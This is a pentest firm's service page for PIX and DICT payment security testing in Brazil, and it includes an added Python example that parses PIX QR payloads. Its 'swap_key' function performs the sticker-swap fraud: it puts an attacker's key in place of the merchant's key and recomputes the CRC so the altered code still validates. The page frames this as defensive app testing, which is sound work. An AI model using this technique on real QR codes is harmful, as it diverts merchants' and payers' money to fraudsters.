/compliance · PIX

PIX and DICT pentest (Circular BACEN 3.978)

Pentest mapped to Circular BACEN 3.978 (PIX): DICT, MED, refunds, QR Code, social-engineering fraud and key abuse.

90% manual · 10% automated
OSCP · CISSP · CRTO · GPEN
BR · PT · IT · ES · MA · US · AU
OWASP · MITRE · PTES · NIST

Why now

The real pain

PIX has become the number-one fraud target in Brazil: the fake-boleto scam, the key scam, MED requests automated by bots. A participant institution is accountable for fraud monitoring (MED) and can be sanctioned by BACEN. A manual PIX pentest validates both the preventive and the detective controls.

Standard and reference

  • Circular BACEN 3.978/2020
  • Circular BACEN 4.131
  • Resolução BCB 1/2020 (PIX)
  • Comunicado 33.455 (MED)

/attack-surface

PIX

Every engagement is designed for your environment. The points below are part of our standard playbook for this sector — final scope is adapted to your stack and contract.

01

API PIX

Generation of immediate charges (cob) and due-date charges (cobv), static and dynamic QR, validation of the signed payload.

02

DICT (chaves)

Registration, linking, portability, ownership claims, scraping/enumeration abuse.

03

MED (Mecanismo Especial de Devolução)

Request, analysis, refund, integration with SPI.

04

Antifraude transacional

Risk scoring, trusted device, geolocation, anomalous amount, time of day.

05

Open Finance PIX (Initiator)

Payment initiation via ITP, consent, redirect, signed return.

06

QR Code malicioso

Sticker substitution at a physical merchant, manipulated payload, validation in the app.
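The QR Code item above comes down to one question the app must answer: what in a scanned PIX BR Code can actually be trusted? As an added example (not intrus.io code and not taken from the page), the block below parses the EMV MPM TLV format used by PIX QR codes, verifies the CRC-16/CCITT-FALSE in field 63, extracts the receiver's key from field 26 (GUI br.gov.bcb.pix), and then performs the sticker-swap attack: replace the key, recompute the CRC, and watch every structural check pass. The merchant name, key, amount and txid are constructed for illustration.

```python
"""PIX BR Code (EMV MPM) parser and CRC-16 check.

Added example for this page, not intrus.io code. Merchant name, key and
txid used here are constructed for illustration only.
"""

GUI_PIX = "br.gov.bcb.pix"  # GUI carried in field 26 subfield 00 of every PIX QR


def crc16_ccitt(data: bytes) -> int:
    """CRC-16/CCITT-FALSE as required by EMV MPM: poly 0x1021, init 0xFFFF."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc


def tlv(tag: str, value: str) -> str:
    """Encode one 'ID(2) LEN(2) VALUE' element; EMV MPM lengths are two digits."""
    if len(value) > 99:
        raise ValueError(f"field {tag} longer than 99 characters")
    return f"{tag}{len(value):02d}{value}"


def parse_tlv(payload: str) -> dict:
    """Decode a sequence of TLV elements into {tag: value}, rejecting truncation."""
    fields, i = {}, 0
    while i < len(payload):
        tag, length = payload[i:i + 2], int(payload[i + 2:i + 4])
        value = payload[i + 4:i + 4 + length]
        if len(value) != length:
            raise ValueError(f"truncated field {tag}")
        fields[tag] = value
        i += 4 + length
    return fields


def verify_crc(payload: str) -> bool:
    """Field 63 must be last; the CRC covers everything up to and including '6304'."""
    if len(payload) < 8 or payload[-8:-4] != "6304":
        return False
    expected = f"{crc16_ccitt(payload[:-4].encode('utf-8')):04X}"
    return payload[-4:].upper() == expected


def parse_pix(payload: str) -> dict:
    """Return the fields a wallet app acts on; raise on a malformed code."""
    if not verify_crc(payload):
        raise ValueError("CRC16 mismatch or missing field 63")
    top = parse_tlv(payload)
    mai = parse_tlv(top.get("26", ""))  # Merchant Account Information
    if mai.get("00", "").lower() != GUI_PIX:
        raise ValueError("field 26 does not carry the PIX GUI")
    extra = parse_tlv(top["62"]) if "62" in top else {}
    return {
        "key": mai.get("01"),      # static QR: receiver's DICT key
        "url": mai.get("25"),      # dynamic QR: location of the PSP-signed cob payload
        "amount": top.get("54"),
        "merchant_name": top.get("59"),
        "city": top.get("60"),
        "txid": extra.get("05"),
    }


def build_pix(key: str, name: str, city: str, amount: str = "", txid: str = "***") -> str:
    """Assemble a static PIX QR payload and append a correct CRC."""
    body = (tlv("00", "01")
            + tlv("26", tlv("00", GUI_PIX) + tlv("01", key))
            + tlv("52", "0000") + tlv("53", "986")
            + (tlv("54", amount) if amount else "")
            + tlv("58", "BR") + tlv("59", name) + tlv("60", city)
            + tlv("62", tlv("05", txid)) + "6304")
    return body + f"{crc16_ccitt(body.encode('utf-8')):04X}"


def swap_key(payload: str, attacker_key: str) -> str:
    """Sticker-swap attack on a printed static QR: keep the merchant's name,
    city and amount, replace the key, recompute the CRC. The result passes
    every check in parse_pix, which is the point: the CRC protects against
    transmission errors, not against a hostile author of the code."""
    f = parse_pix(payload)
    return build_pix(attacker_key, f["merchant_name"], f["city"], f["amount"] or "", f["txid"] or "***")


if __name__ == "__main__":
    legit = build_pix("loja@example.com", "Loja Exemplo", "SAO PAULO", "10.00", "TX123")
    print("legit   ", parse_pix(legit))
    print("swapped ", parse_pix(swap_key(legit, "evil@example.com")))
```

The take-away for the app-side test is that a structurally valid code with a correct CRC says nothing about who receives the money. For a static QR the only authenticity signal is the DICT resolution of the key (the holder's name and institution shown to the payer before confirmation, which must not be silently matched against field 59); for a dynamic QR the app must fetch the cob payload from the URL in field 26 and verify the receiving PSP's signature on it rather than trusting the scanned text.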

/methodology

Genuinely manual pentest

Automated scanners find what's documented. Real attackers find what isn't. 90% of the work is manual — performed by specialists holding OSCP, CISSP, CRTO and GPEN.

01 · Reconnaissance

Target mapping, OSINT, footprint, sector-specific threat modeling.

02 · Discovery

Deep enumeration, complementary scanning, manual exposure identification.

03 · Exploitation

Manual validation with controlled PoC, finding chaining, escalation.

04 · Report

Executive + technical, step-by-step replication, mapped to applicable regulation.

/why-trust

Who has trusted our work

PIX pentests at fintechs, digital banks and acquirers; ongoing fraud-monitoring work.

Caixa Econômica Federal
Banco BMG
iFood
ArcelorMittal
Multibanco
Polícia Federal
Fórmula 1
OpenFinance

Technical assessment recognized in highly regulated, mission-critical environments — the pentest that finds what nobody had found before.


Douglas Lopes

Founder · CEO · intrus.io

/crivo · integrity program

87%

of pentester candidates fail our Crivo screening

Do you know who's getting access to your environment?

NDAs work in court. They don't work day-to-day. Before first access, every pentester on our team passes background, psychometric profile and integrity testing.

  • In-depth criminal, fiscal and professional verification
  • Psychometric assessment and risk profile
  • Practical integrity testing with controlled scenarios
  • Fixed team — non-rotating, no 'stranger every engagement'

/faq

FAQ — PIX

Do you test MED?

Yes. We audit the request, analysis and refund flow, regulatory deadlines and SPI integration.

Price range?

API PIX alone: R$ 20-45k. PIX + DICT + MED + anti-fraud: R$ 50-120k. PIX + Open Finance ITP: R$ 70-180k.

/contact

Request a PIX pentest quote

Schedule a confidential meeting. Within 48h we'll send a proposal with scope, timeline and pricing.